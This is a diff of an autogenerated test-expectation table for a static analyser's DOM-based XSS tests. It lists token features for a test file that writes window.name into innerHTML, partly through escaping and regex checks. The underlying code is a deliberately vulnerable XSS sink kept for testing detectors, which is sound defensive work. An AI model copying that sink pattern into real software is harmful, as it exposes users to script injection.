innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:16 | regex.exec | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:16 | regex.exec | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | exceptional return of regex.exec(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | exceptional return of regex.exec(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | exceptional return of regex.exec(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | exceptional return of regex.exec(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | exceptional return of regex.exec(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | regex.exec(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | regex.exec(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | regex.exec(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | regex.exec(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:25 | regex.exec(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:33 | regex.e ... != null | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:33 | regex.e ... != null | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:33 | regex.e ... != null | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:33 | regex.e ... != null | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:7:37:33 | regex.e ... != null | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:13:37:16 | exec | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:13:37:16 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:13:37:16 | exec | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:13:37:16 | exec | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:13:37:16 | exec | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:37:18:37:24 | tainted | CalleeFlexibleAccessPath | regex.exec | | autogenerated/Xss/DomBasedXss/sanitiser.js:37:18:37:24 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:37:18:37:24 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -15068,12 +108489,42 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:37:18:37:24 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:37:18:37:24 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:37:18:37:24 | tainted | receiverName | regex | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:30:37:33 | null | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:30:37:33 | null | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:30:37:33 | null | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:30:37:33 | null | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:37:30:37:33 | null | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:5:38:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:9:38:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:9:38:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:9:38:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:9:38:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:9:38:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:21:38:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15092,12 +108543,37 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:38:39:38:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:39:38:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:38:39:38:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:7 | elt | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:7 | elt | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:17 | elt.innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:17 | elt.innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:17 | elt.innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:17 | elt.innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:17 | elt.innerHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:44 | elt.inn ... '    ' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:44 | elt.inn ... '    ' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:44 | elt.inn ... '    ' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:44 | elt.inn ... '    ' | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:5:40:44 | elt.inn ... '    ' | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:9:40:17 | innerHTML | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:9:40:17 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:9:40:17 | innerHTML | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:9:40:17 | innerHTML | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:9:40:17 | innerHTML | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:25 | '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:25 | '' | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:25 | '' | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:25 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:25 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:25 | '' | stringConcatenatedWith | -endpoint- tainted + '' | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:35 | '' + tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:35 | '' + tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:35 | '' + tainted | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:35 | '' + tainted | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:35 | '' + tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:44 | '' + ... '' | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:44 | '' + ... '' | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:21:40:44 | '' + ... '' | contextSurroundingFunctionParameters | () | @@ -15116,6 +108592,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:40:39:40:44 | '' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:39:40:44 | '' | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:40:39:40:44 | '    ' | stringConcatenatedWith | '' + tainted -endpoint- | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:11 | regex | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:11 | regex | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:11 | regex | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:11 | regex | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:11 | regex | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:16 | regex.exec | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:16 | regex.exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:16 | regex.exec | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:16 | regex.exec | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:16 | regex.exec | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | exceptional return of regex.exec(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | exceptional return of regex.exec(tainted) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | exceptional return of regex.exec(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | exceptional return of regex.exec(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | exceptional return of regex.exec(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | regex.exec(tainted) | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | regex.exec(tainted) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | regex.exec(tainted) | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | regex.exec(tainted) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:25 | regex.exec(tainted) | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:33 | regex.e ... == null | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:33 | regex.e ... == null | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:33 | regex.e ... == null | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:33 | regex.e ... == null | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:7:42:33 | regex.e ... == null | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:13:42:16 | exec | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:13:42:16 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:13:42:16 | exec | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:13:42:16 | exec | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:13:42:16 | exec | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:42:18:42:24 | tainted | CalleeFlexibleAccessPath | regex.exec | | autogenerated/Xss/DomBasedXss/sanitiser.js:42:18:42:24 | tainted | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/sanitiser.js:42:18:42:24 | tainted | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | @@ -15124,12 +108630,42 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/sanitiser.js:42:18:42:24 | tainted | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/sanitiser.js:42:18:42:24 | tainted | fileImports | | | autogenerated/Xss/DomBasedXss/sanitiser.js:42:18:42:24 | tainted | receiverName | regex | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:30:42:33 | null | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:30:42:33 | null | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:30:42:33 | null | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
    regex /[<>'"&]/ regex test tainted elt innerHTML tainted elt innerHTML tainted regex test tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted regex exec tainted null elt innerHTML tainted elt innerHTML tainted elt innerHTML tainted replace /<\\w+/g | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:30:42:33 | null | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/sanitiser.js:42:30:42:33 | null | fileImports | | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:7 | elt | contextFunctionInterfaces | escapeAttr(s)\nescapeHtml(s)\ntest() | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:7 | elt | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/sanitiser.js:43:5:43:7 | elt | enclosingFunctionBody | tainted window name elt document createElement elt innerHTML escapeHtml tainted elt innerHTML
    escapeAttr tainted
